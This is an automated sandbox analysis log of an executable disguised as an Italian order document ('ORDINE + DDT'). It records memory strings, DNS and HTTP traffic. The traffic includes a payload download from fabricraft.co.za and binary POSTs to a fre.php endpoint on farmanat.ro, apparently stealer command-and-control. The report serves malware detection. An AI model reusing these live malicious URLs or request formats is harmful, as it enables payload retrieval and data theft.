Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: ORDINE + DDT A.M.F SpA.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238316483595.000001896B13A000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238332289921.000001896AE44000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242870817729.000001896B13A000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: ORDINE + DDT A.M.F SpA.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238323976665.000001896AFAE000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238321645377.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867014534.000001896AE3F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312403907.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1.crt0
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242865101495.00000000008EE000.00000004.00000020.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238265231618.00000000008F4000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238264679132.00000000008F4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238332289921.000001896AE44000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867069174.000001896AE44000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242865101495.00000000008EE000.00000004.00000020.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238265231618.00000000008F4000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238264679132.00000000008F4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238332289921.000001896AE44000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867069174.000001896AE44000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ORDINE + DDT A.M.F SpA.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238316483595.000001896B13A000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238332289921.000001896AE44000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242870817729.000001896B13A000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0
Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238323976665.000001896AFAE000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238321645377.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867014534.000001896AE3F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312403907.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238334385048.000001896B043000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869451561.000001896B047000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ORDINE + DDT A.M.F SpA.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: ORDINE + DDT A.M.F SpA.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238316483595.000001896B13A000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238332289921.000001896AE44000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242870817729.000001896B13A000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0
Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238323976665.000001896AFAE000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238321645377.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867014534.000001896AE3F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312403907.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: ORDINE + DDT A.M.F SpA.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: lsass.exe, 0000000C.00000000.238314085790.000001896AEE7000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867965216.000001896AEE7000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242866479369.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238316483595.000001896B13A000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238332289921.000001896AE44000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242870817729.000001896B13A000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238334385048.000001896B043000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869451561.000001896B047000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: ORDINE + DDT A.M.F SpA.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0G
Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238323976665.000001896AFAE000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238321645377.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867014534.000001896AE3F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312403907.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: ORDINE + DDT A.M.F SpA.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312051289.000001896A697000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238321645377.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867684725.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238334385048.000001896B043000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238331126240.000001896A697000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865216162.000001896A697000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869451561.000001896B047000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312403907.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238323976665.000001896AFAE000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238321645377.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867014534.000001896AE3F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312403907.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/CPS0~
Source: lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.live.com
Source: lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmp	String found in binary or memory: https://fabricraft.co.za/
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmp	String found in binary or memory: https://fabricraft.co.za/.
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866850076.0000000002430000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmp	String found in binary or memory: https://fabricraft.co.za/Farmant_hhVNwJna195.bin
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmp	String found in binary or memory: https://fabricraft.co.za/Farmant_hhVNwJna195.binc
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmp	String found in binary or memory: https://fabricraft.co.za/Farmant_hhVNwJna195.binn
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmp	String found in binary or memory: https://fabricraft.co.za/Farmant_hhVNwJna195.binws;
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864836413.00000000008D1000.00000004.00000020.sdmp	String found in binary or memory: https://farmanat.ro/arman30/five/fre.php
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238266059758.000000001E4B0000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238266059758.000000001E4B0000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com//
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238266059758.000000001E4B0000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238266059758.000000001E4B0000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/v104
Source: ORDINE + DDT A.M.F SpA.exe	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown

HTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 178Connection: close

Source: unknown

DNS traffic detected: queries for: fabricraft.co.za

Source: global traffic

HTTP traffic detected: GET /Farmant_hhVNwJna195.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: fabricraft.co.zaCache-Control: no-cache

Source: unknown

HTTPS traffic detected: 197.242.150.64:443 -> 192.168.11.20:49816 version: TLS 1.2

Source: ORDINE + DDT A.M.F SpA.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022782FF	2_2_022782FF
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227CF92	2_2_0227CF92
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02277625	2_2_02277625
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227622C	2_2_0227622C
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276A38	2_2_02276A38
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227D203	2_2_0227D203
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02278A09	2_2_02278A09
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227BE73	2_2_0227BE73
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227BE7D	2_2_0227BE7D
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227D245	2_2_0227D245
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02272655	2_2_02272655
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227B651	2_2_0227B651
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227C251	2_2_0227C251
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227768F	2_2_0227768F
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227728D	2_2_0227728D
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276AE4	2_2_02276AE4
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227C2E1	2_2_0227C2E1
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276ED6	2_2_02276ED6
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227B6DF	2_2_0227B6DF
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227C2DF	2_2_0227C2DF
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02278327	2_2_02278327
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227732E	2_2_0227732E
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227871A	2_2_0227871A
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276768	2_2_02276768
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02278775	2_2_02278775
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02276770	2_2_02276770
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227CFA2	2_2_0227CFA2
